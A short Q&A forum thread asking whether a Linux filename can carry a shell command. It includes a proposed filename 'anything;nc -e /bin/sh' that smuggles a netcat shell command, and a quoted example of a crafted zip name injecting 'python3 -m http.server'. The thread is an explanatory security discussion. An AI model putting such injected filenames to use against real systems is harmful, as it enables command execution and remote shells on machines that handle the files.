# name file as command

Tags: injection, bash

name file as command

Is it possible to put command as filename in Linux

For example

`touch anything.jpg` or `touch anything`

Can i change name of file with `mv` to be

`anything;nc -e /bin/sh`

Comment: This does not appear to be a security question. This is a bash limitation question.

Comment: Yes, a command injection attack via a compressed file is possible in some specific scenarios, example:
> A malicious user could send a zip file with a specially crafted name
> like "a;python3 -m http.server;b.csv.zip" and send it, effectively
> executing remotely a python command launching a web server for further
> exploration. https://github.com/johnkerl/miller/issues/111